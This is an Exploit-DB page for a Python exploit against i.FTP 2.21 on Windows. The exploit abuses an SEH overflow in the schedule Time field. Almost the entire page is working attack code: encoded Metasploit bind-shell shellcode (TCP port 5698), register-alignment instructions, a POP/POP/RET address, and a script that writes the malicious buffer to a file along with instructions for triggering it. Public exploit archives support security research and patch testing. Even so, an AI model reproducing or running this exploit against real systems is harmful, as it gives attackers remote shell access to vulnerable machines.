i.FTP 2.21 - Time Field (SEH)

EDB-ID:

36984

CVE:


EDB Verified:

Author:

Revin Hadi Saputra

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2015-05-11

Vulnerable App: 
#!/usr/bin/python
# Exploit Title		: i.FTP 2.21 Time Field SEH Exploit
# Exploit Author	: Revin Hadi S
# Vulnerability PoC	: Avinash Kumar Thapa "-Acid"
# PoC Link		: https://www.exploit-db.com/exploits/36847/
# Date			: 05/08/2015
# Vendor		: http://www.memecode.com/iftp.php
# Software Link		: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version		: 2.21
# Tested On		: Win 7 SP1 Eng & Win XP SP2
# Triggering Exploit	: Go to Schedule > Schedule download > {+} >Time field

# msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_upper BufferRegister=EAX -t c
shellcode = ("\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x33\x30\x53\x30\x53\x30\x35\x30\x4b\x39"
"\x4a\x45\x30\x31\x4e\x32\x55\x34\x4c\x4b\x31\x42\x46\x50\x4c"
"\x4b\x51\x42\x54\x4c\x4c\x4b\x46\x32\x35\x44\x4c\x4b\x54\x32"
"\x57\x58\x54\x4f\x38\x37\x31\x5a\x31\x36\x50\x31\x4b\x4f\x36"
"\x51\x59\x50\x4e\x4c\x47\x4c\x53\x51\x53\x4c\x44\x42\x56\x4c"
"\x47\x50\x49\x51\x48\x4f\x54\x4d\x43\x31\x39\x57\x4d\x32\x4a"
"\x50\x51\x42\x50\x57\x4c\x4b\x46\x32\x34\x50\x4c\x4b\x51\x52"
"\x37\x4c\x53\x31\x4e\x30\x4c\x4b\x51\x50\x54\x38\x4d\x55\x39"
"\x50\x32\x54\x50\x4a\x45\x51\x58\x50\x56\x30\x4c\x4b\x50\x48"
"\x44\x58\x4c\x4b\x36\x38\x47\x50\x33\x31\x48\x53\x5a\x43\x47"
"\x4c\x30\x49\x4c\x4b\x36\x54\x4c\x4b\x33\x31\x38\x56\x46\x51"
"\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x38\x4f\x44\x4d\x55"
"\x51\x48\x47\x46\x58\x4d\x30\x33\x45\x4b\x44\x44\x43\x53\x4d"
"\x4a\x58\x47\x4b\x43\x4d\x47\x54\x54\x35\x5a\x42\x30\x58\x4c"
"\x4b\x31\x48\x51\x34\x53\x31\x49\x43\x52\x46\x4c\x4b\x44\x4c"
"\x30\x4b\x4c\x4b\x36\x38\x45\x4c\x55\x51\x4e\x33\x4c\x4b\x55"
"\x54\x4c\x4b\x43\x31\x38\x50\x4b\x39\x57\x34\x37\x54\x37\x54"
"\x31\x4b\x51\x4b\x53\x51\x51\x49\x51\x4a\x46\x31\x4b\x4f\x4d"
"\x30\x31\x48\x51\x4f\x31\x4a\x4c\x4b\x55\x42\x5a\x4b\x4c\x46"
"\x31\x4d\x33\x58\x46\x53\x47\x42\x43\x30\x43\x30\x43\x58\x52"
"\x57\x42\x53\x36\x52\x31\x4f\x50\x54\x43\x58\x30\x4c\x52\x57"
"\x51\x36\x43\x37\x4b\x4f\x4e\x35\x38\x38\x4c\x50\x55\x51\x33"
"\x30\x35\x50\x46\x49\x4f\x34\x36\x34\x36\x30\x52\x48\x57\x59"
"\x4d\x50\x52\x4b\x53\x30\x4b\x4f\x58\x55\x46\x30\x50\x50\x36"
"\x30\x30\x50\x31\x50\x46\x30\x31\x50\x50\x50\x35\x38\x4b\x5a"
"\x44\x4f\x39\x4f\x4d\x30\x4b\x4f\x39\x45\x4c\x49\x48\x47\x50"
"\x31\x49\x4b\x46\x33\x52\x48\x43\x32\x55\x50\x32\x36\x50\x42"
"\x4c\x49\x4b\x56\x52\x4a\x52\x30\x36\x36\x31\x47\x43\x58\x39"
"\x52\x59\x4b\x57\x47\x32\x47\x4b\x4f\x39\x45\x50\x53\x46\x37"
"\x32\x48\x38\x37\x4b\x59\x56\x58\x4b\x4f\x4b\x4f\x39\x45\x31"
"\x43\x51\x43\x30\x57\x35\x38\x33\x44\x5a\x4c\x57\x4b\x4b\x51"
"\x4b\x4f\x49\x45\x51\x47\x4c\x49\x4f\x37\x33\x58\x33\x45\x42"
"\x4e\x50\x4d\x33\x51\x4b\x4f\x59\x45\x32\x48\x32\x43\x42\x4d"
"\x52\x44\x43\x30\x4c\x49\x5a\x43\x46\x37\x51\x47\x31\x47\x30"
"\x31\x4a\x56\x52\x4a\x34\x52\x50\x59\x31\x46\x4a\x42\x4b\x4d"
"\x53\x56\x39\x57\x57\x34\x31\x34\x47\x4c\x53\x31\x55\x51\x4c"
"\x4d\x31\x54\x46\x44\x52\x30\x38\x46\x55\x50\x51\x54\x46\x34"
"\x30\x50\x30\x56\x36\x36\x46\x36\x50\x46\x31\x46\x50\x4e\x56"
"\x36\x46\x36\x50\x53\x30\x56\x55\x38\x53\x49\x58\x4c\x37\x4f"
"\x4c\x46\x4b\x4f\x59\x45\x4d\x59\x4b\x50\x50\x4e\x46\x36\x50"
"\x46\x4b\x4f\x50\x30\x53\x58\x43\x38\x4d\x57\x45\x4d\x35\x30"
"\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x58\x35\x39\x32\x56\x36\x33"
"\x58\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x37\x4c"
"\x35\x56\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x33\x45\x44"
"\x45\x4f\x4b\x47\x37\x42\x33\x32\x52\x52\x4f\x52\x4a\x35\x50"
"\x31\x43\x4b\x4f\x39\x45\x41\x41")

# Align Shellcode to EAX register
align = "\x58"*3		# POP EAX; POP EAX; POP EAX
align += "\x2d\x77\x77\x77\x77"	# SUB EAX, 0x77777777
align += "\x2d\x77\x33\x33\x33"	# SUB EAX, 0x33333377
align += "\x2d\x77\x22\x22\x22"	# SUB EAX, 0x22222277
align += "\x2d\x3b\x32\x33\x33"	# SUB EAX, 0x3333323b

buffer = "A"*300
buffer += "\x40\x75\x21\x40"	
buffer += "\x67\x59\x02\x10"	# /p/p/r Lgi.dll
buffer += "DOGE"*7		
buffer += align		
buffer += "\x43"*37		
buffer += shellcode

f = open("evil.txt", "wb")
f.write(buffer)
f.close()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services